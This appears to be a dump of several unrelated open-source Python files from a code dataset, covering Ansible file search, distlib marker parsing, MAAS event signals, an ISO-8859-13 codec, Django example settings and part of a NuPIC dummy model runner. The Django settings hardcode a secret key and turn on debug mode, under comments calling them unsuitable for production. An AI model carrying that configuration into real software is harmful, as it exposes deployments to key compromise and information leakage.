contains = dict(default=None, type='str'),
file_type = dict(default="file", choices=['file', 'directory', 'link', 'any'], type='str'),
age = dict(default=None, type='str'),
age_stamp = dict(default="mtime", choices=['atime','mtime','ctime'], type='str'),
size = dict(default=None, type='str'),
recurse = dict(default='no', type='bool'),
hidden = dict(default="False", type='bool'),
follow = dict(default="False", type='bool'),
get_checksum = dict(default="False", type='bool'),
use_regex = dict(default="False", type='bool'),
),
supports_check_mode=True,
)
params = module.params
filelist = []
if params['age'] is None:
age = None
else:
# convert age to seconds:
m = re.match("^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
if m:
age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
else:
module.fail_json(age=params['age'], msg="failed to process age")
if params['size'] is None:
size = None
else:
# convert size to bytes:
m = re.match("^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
if m:
size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
else:
module.fail_json(size=params['size'], msg="failed to process size")
now = time.time()
msg = ''
looked = 0
for npath in params['paths']:
npath = os.path.expanduser(os.path.expandvars(npath))
if os.path.isdir(npath):
''' ignore followlinks for python version < 2.6 '''
for root,dirs,files in (sys.version_info < (2,6,0) and os.walk(npath)) or \
os.walk( npath, followlinks=params['follow']):
looked = looked + len(files) + len(dirs)
for fsobj in (files + dirs):
fsname=os.path.normpath(os.path.join(root, fsobj))
if os.path.basename(fsname).startswith('.') and not params['hidden']:
continue
try:
st = os.lstat(fsname)
except:
msg+="%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
continue
r = {'path': fsname}
if params['file_type'] == 'any':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
if pfilter(fsobj, params['patterns'], params['use_regex']) and \
agefilter(st, now, age, params['age_stamp']) and \
sizefilter(st, size) and \
contentfilter(fsname, params['contains']):
r.update(statinfo(st))
if params['get_checksum']:
r['checksum'] = module.sha1(fsname)
filelist.append(r)
elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
if not params['recurse']:
break
else:
msg+="%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath
matched = len(filelist)
module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
chalasr/Flask-P2P | venv/lib/python2.7/site-packages/pip/_vendor/distlib/markers.py | 1261 | 6282 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Parser for the environment markers micro-language defined in PEP 345."""
import ast
import os
import sys
import platform
from .compat import python_implementation, string_types
from .util import in_venv
__all__ = ['interpret']
class Evaluator(object):
"""
A limited evaluator for Python expressions.
"""
operators = {
'eq': lambda x, y: x == y,
'gt': lambda x, y: x > y,
'gte': lambda x, y: x >= y,
'in': lambda x, y: x in y,
'lt': lambda x, y: x < y,
'lte': lambda x, y: x <= y,
'not': lambda x: not x,
'noteq': lambda x, y: x != y,
'notin': lambda x, y: x not in y,
}
allowed_values = {
'sys_platform': sys.platform,
'python_version': '%s.%s' % sys.version_info[:2],
# parsing sys.platform is not reliable, but there is no other
# way to get e.g. 2.7.2+, and the PEP is defined with sys.version
'python_full_version': sys.version.split(' ', 1)[0],
'os_name': os.name,
'platform_in_venv': str(in_venv()),
'platform_release': platform.release(),
'platform_version': platform.version(),
'platform_machine': platform.machine(),
'platform_python_implementation': python_implementation(),
}
def __init__(self, context=None):
"""
Initialise an instance.
:param context: If specified, names are looked up in this mapping.
"""
self.context = context or {}
self.source = None
def get_fragment(self, offset):
"""
Get the part of the source which is causing a problem.
"""
fragment_len = 10
s = '%r' % (self.source[offset:offset + fragment_len])
if offset + fragment_len < len(self.source):
s += '...'
return s
def get_handler(self, node_type):
"""
Get a handler for the specified AST node type.
"""
return getattr(self, 'do_%s' % node_type, None)
def evaluate(self, node, filename=None):
"""
Evaluate a source string or node, using ``filename`` when
displaying errors.
"""
if isinstance(node, string_types):
self.source = node
kwargs = {'mode': 'eval'}
if filename:
kwargs['filename'] = filename
try:
node = ast.parse(node, **kwargs)
except SyntaxError as e:
s = self.get_fragment(e.offset)
raise SyntaxError('syntax error %s' % s)
node_type = node.__class__.__name__.lower()
handler = self.get_handler(node_type)
if handler is None:
if self.source is None:
s = '(source not available)'
else:
s = self.get_fragment(node.col_offset)
raise SyntaxError("don't know how to evaluate %r %s" % (
node_type, s))
return handler(node)
def get_attr_key(self, node):
assert isinstance(node, ast.Attribute), 'attribute node expected'
return '%s.%s' % (node.value.id, node.attr)
def do_attribute(self, node):
if not isinstance(node.value, ast.Name):
valid = False
else:
key = self.get_attr_key(node)
valid = key in self.context or key in self.allowed_values
if not valid:
raise SyntaxError('invalid expression: %s' % key)
if key in self.context:
result = self.context[key]
else:
result = self.allowed_values[key]
return result
def do_boolop(self, node):
result = self.evaluate(node.values[0])
is_or = node.op.__class__ is ast.Or
is_and = node.op.__class__ is ast.And
assert is_or or is_and
if (is_and and result) or (is_or and not result):
for n in node.values[1:]:
result = self.evaluate(n)
if (is_or and result) or (is_and and not result):
break
return result
def do_compare(self, node):
def sanity_check(lhsnode, rhsnode):
valid = True
if isinstance(lhsnode, ast.Str) and isinstance(rhsnode, ast.Str):
valid = False
#elif (isinstance(lhsnode, ast.Attribute)
# and isinstance(rhsnode, ast.Attribute)):
# klhs = self.get_attr_key(lhsnode)
# krhs = self.get_attr_key(rhsnode)
# valid = klhs != krhs
if not valid:
s = self.get_fragment(node.col_offset)
raise SyntaxError('Invalid comparison: %s' % s)
lhsnode = node.left
lhs = self.evaluate(lhsnode)
result = True
for op, rhsnode in zip(node.ops, node.comparators):
sanity_check(lhsnode, rhsnode)
op = op.__class__.__name__.lower()
if op not in self.operators:
raise SyntaxError('unsupported operation: %r' % op)
rhs = self.evaluate(rhsnode)
result = self.operators[op](lhs, rhs)
if not result:
break
lhs = rhs
lhsnode = rhsnode
return result
def do_expression(self, node):
return self.evaluate(node.body)
def do_name(self, node):
valid = False
if node.id in self.context:
valid = True
result = self.context[node.id]
elif node.id in self.allowed_values:
valid = True
result = self.allowed_values[node.id]
if not valid:
raise SyntaxError('invalid expression: %s' % node.id)
return result
def do_str(self, node):
return node.s
def interpret(marker, execution_context=None):
"""
Interpret a marker and return a result depending on environment.
:param marker: The marker to interpret.
:type marker: str
:param execution_context: The context used for name lookup.
:type execution_context: mapping
"""
return Evaluator(execution_context).evaluate(marker.strip())
| mit |
maas/maas | src/maasserver/models/signals/scriptresult.py | 1 | 3228 | # Copyright 2019 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Emit ScriptResult status transition event."""
from maasserver.models import Event
from maasserver.preseed import CURTIN_INSTALL_LOG
from maasserver.utils.signals import SignalsManager
from metadataserver.enum import (
RESULT_TYPE,
SCRIPT_STATUS,
SCRIPT_STATUS_CHOICES,
SCRIPT_STATUS_FAILED,
SCRIPT_STATUS_RUNNING,
)
from metadataserver.models.scriptresult import ScriptResult
from provisioningserver.events import EVENT_TYPES
signals = SignalsManager()
def emit_script_result_status_transition_event(
script_result, old_values, **kwargs
):
"""Send a status transition event."""
[old_status] = old_values
if script_result.physical_blockdevice and script_result.interface:
script_name = "%s on %s and %s" % (
script_result.name,
script_result.physical_blockdevice.name,
script_result.interface.name,
)
elif script_result.physical_blockdevice:
script_name = "%s on %s" % (
script_result.name,
script_result.physical_blockdevice.name,
)
elif script_result.interface:
script_name = "%s on %s" % (
script_result.name,
script_result.interface.name,
)
else:
script_name = script_result.name
if (
script_result.script_set.result_type == RESULT_TYPE.TESTING
and old_status == SCRIPT_STATUS.PENDING
and (script_result.status in SCRIPT_STATUS_RUNNING)
):
Event.objects.create_node_event(
script_result.script_set.node,
EVENT_TYPES.RUNNING_TEST,
event_description=script_name,
)
elif script_result.status in SCRIPT_STATUS_FAILED.union(
{SCRIPT_STATUS.ABORTED}
):
Event.objects.create_node_event(
script_result.script_set.node,
EVENT_TYPES.SCRIPT_DID_NOT_COMPLETE,
event_description="%s %s"
% (
script_name,
SCRIPT_STATUS_CHOICES[script_result.status][1].lower(),
),
)
else:
old_status_name = None
new_status_name = None
for status, status_name in SCRIPT_STATUS_CHOICES:
if old_status == status:
old_status_name = status_name
elif script_result.status == status:
new_status_name = status_name
Event.objects.create_node_event(
script_result.script_set.node,
EVENT_TYPES.SCRIPT_RESULT_CHANGED_STATUS,
event_description="%s changed status from '%s' to '%s'"
% (script_name, old_status_name, new_status_name),
)
if (
CURTIN_INSTALL_LOG == script_result.name
and not script_result.script_set.node.netboot
):
Event.objects.create_node_event(
script_result.script_set.node, EVENT_TYPES.REBOOTING
)
signals.watch_fields(
emit_script_result_status_transition_event,
ScriptResult,
["status"],
delete=False,
)
# Enable all signals by default.
signals.enable()
| agpl-3.0 |
ppyordanov/HCI_4_Future_Cities | Server/src/virtualenv/Lib/encodings/iso8859_13.py | 1 | 12597 | """ Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py.
""" # "
import codecs
# ## Codec APIs
class Codec(codecs.Codec):
def encode(self, input, errors='strict'):
return codecs.charmap_encode(input, errors, encoding_table)
def decode(self, input, errors='strict'):
return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
pass
class StreamReader(Codec, codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-13',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u201d' # 0xA1 -> RIGHT DOUBLE QUOTATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\u201e' # 0xA5 -> DOUBLE LOW-9 QUOTATION MARK
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xd8' # 0xA8 -> LATIN CAPITAL LETTER O WITH STROKE
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u0156' # 0xAA -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xc6' # 0xAF -> LATIN CAPITAL LETTER AE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\u201c' # 0xB4 -> LEFT DOUBLE QUOTATION MARK
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xf8' # 0xB8 -> LATIN SMALL LETTER O WITH STROKE
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\u0157' # 0xBA -> LATIN SMALL LETTER R WITH CEDILLA
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xe6' # 0xBF -> LATIN SMALL LETTER AE
u'\u0104' # 0xC0 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\u012e' # 0xC1 -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u0100' # 0xC2 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u0106' # 0xC3 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\u0118' # 0xC6 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\u0112' # 0xC7 -> LATIN CAPITAL LETTER E WITH MACRON
u'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0179' # 0xCA -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\u0116' # 0xCB -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\u0122' # 0xCC -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\u0136' # 0xCD -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u012a' # 0xCE -> LATIN CAPITAL LETTER I WITH MACRON
u'\u013b' # 0xCF -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u0160' # 0xD0 -> LATIN CAPITAL LETTER S WITH CARON
u'\u0143' # 0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\u0145' # 0xD2 -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\u014c' # 0xD4 -> LATIN CAPITAL LETTER O WITH MACRON
u'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u0172' # 0xD8 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u0141' # 0xD9 -> LATIN CAPITAL LETTER L WITH STROKE
u'\u015a' # 0xDA -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u016a' # 0xDB -> LATIN CAPITAL LETTER U WITH MACRON
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u017b' # 0xDD -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u017d' # 0xDE -> LATIN CAPITAL LETTER Z WITH CARON
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
u'\u0105' # 0xE0 -> LATIN SMALL LETTER A WITH OGONEK
u'\u012f' # 0xE1 -> LATIN SMALL LETTER I WITH OGONEK
u'\u0101' # 0xE2 -> LATIN SMALL LETTER A WITH MACRON
u'\u0107' # 0xE3 -> LATIN SMALL LETTER C WITH ACUTE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\u0119' # 0xE6 -> LATIN SMALL LETTER E WITH OGONEK
u'\u0113' # 0xE7 -> LATIN SMALL LETTER E WITH MACRON
u'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\u017a' # 0xEA -> LATIN SMALL LETTER Z WITH ACUTE
u'\u0117' # 0xEB -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\u0123' # 0xEC -> LATIN SMALL LETTER G WITH CEDILLA
u'\u0137' # 0xED -> LATIN SMALL LETTER K WITH CEDILLA
u'\u012b' # 0xEE -> LATIN SMALL LETTER I WITH MACRON
u'\u013c' # 0xEF -> LATIN SMALL LETTER L WITH CEDILLA
u'\u0161' # 0xF0 -> LATIN SMALL LETTER S WITH CARON
u'\u0144' # 0xF1 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0146' # 0xF2 -> LATIN SMALL LETTER N WITH CEDILLA
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\u014d' # 0xF4 -> LATIN SMALL LETTER O WITH MACRON
u'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u0173' # 0xF8 -> LATIN SMALL LETTER U WITH OGONEK
u'\u0142' # 0xF9 -> LATIN SMALL LETTER L WITH STROKE
u'\u015b' # 0xFA -> LATIN SMALL LETTER S WITH ACUTE
u'\u016b' # 0xFB -> LATIN SMALL LETTER U WITH MACRON
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u017c' # 0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u017e' # 0xFE -> LATIN SMALL LETTER Z WITH CARON
u'\u2019' # 0xFF -> RIGHT SINGLE QUOTATION MARK
)
### Encoding table
encoding_table = codecs.charmap_build(decoding_table)
| mit |
Sjord/django-oidc-provider | example_project/provider_app/settings.py | 2 | 1690 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'waw%j=vza!vc1^eyosw%#_!gg96%zb7sp*+!owkutue4i(sm91'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'provider_app',
'oidc_provider',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'provider_app.urls'
WSGI_APPLICATION = 'provider_app.wsgi.application'
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/'
# OIDC Provider settings.
SITE_URL = 'http://localhost:8000' | mit |
marionleborgne/nupic | src/nupic/swarming/DummyModelRunner.py | 8 | 25439 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import copy
import itertools
import json
import math
import os
import random
import sys
import time
from nupic.frameworks.opf.modelfactory import ModelFactory
from nupic.frameworks.opf import opfhelpers
from nupic.frameworks.opf.opfutils import ModelResult
from nupic.swarming import utils
from nupic.swarming.ModelRunner import OPFModelRunner
class OPFDummyModelRunner(OPFModelRunner):
""" This class runs a 'dummy' OPF Experiment. It will periodically update the
models db with a deterministic metric value. It can also simulate different
amounts of computation time
"""
modelIndex = 0
metrics = [lambda x: float(x+1),
lambda x: 100.0 - x-1,
lambda x: 20.0 * math.sin(x),
lambda x: (x/9.0)**2]
_DEFAULT_PARAMS = dict(delay= None,
finalDelay=None,
waitTime=None,
randomizeWait=None,
iterations=1,
metricFunctions=None,
metricValue=None,
finalize=True,
permutationParams={},
experimentDirectory=None,
makeCheckpoint=False,
sysExitModelRange=None,
delayModelRange=None,
exitAfter=None,
errModelRange=None,
sleepModelRange=None,
jobFailErr=False,
)
# Dummy streamDef.
_DUMMY_STREAMDEF = dict(
version = 1,
info = "test_NoProviders",
streams = [
dict(source="file://%s" % (os.path.join("extra", "hotgym",
"joined_mosman_2011.csv")),
info="hotGym.csv",
columns=["*"],
#last_record=-1,
),
],
aggregation = {
'hours': 1,
'fields': [
('consumption', 'sum'),
('timestamp', 'first'),
('TEMP', 'mean'),
('DEWP', 'mean'),
#('SLP', 'mean'),
#('STP', 'mean'),
('MAX', 'mean'),
('MIN', 'mean'),
('PRCP', 'sum'),
],
},
)
def __init__(self,
modelID,
jobID,
params,
predictedField,
reportKeyPatterns,
optimizeKeyPattern,
jobsDAO,
modelCheckpointGUID,
logLevel=None,
predictionCacheMaxRecords=None):
"""
Parameters:
-------------------------------------------------------------------------
modelID: ID of this model in the models table
jobID:
params: a dictionary of parameters for this dummy model. The
possible keys are:
delay: OPTIONAL-This specifies the amount of time
(in seconds) that the experiment should wait
before STARTING to process records. This is
useful for simulating workers that start/end
at different times
finalDelay: OPTIONAL-This specifies the amount of time
(in seconds) that the experiment should wait
before it conducts its finalization operations.
These operations include checking if the model
is the best model, and writing out checkpoints.
waitTime: OPTIONAL-The amount of time (in seconds)
to wait in a busy loop to simulate
computation time on EACH ITERATION
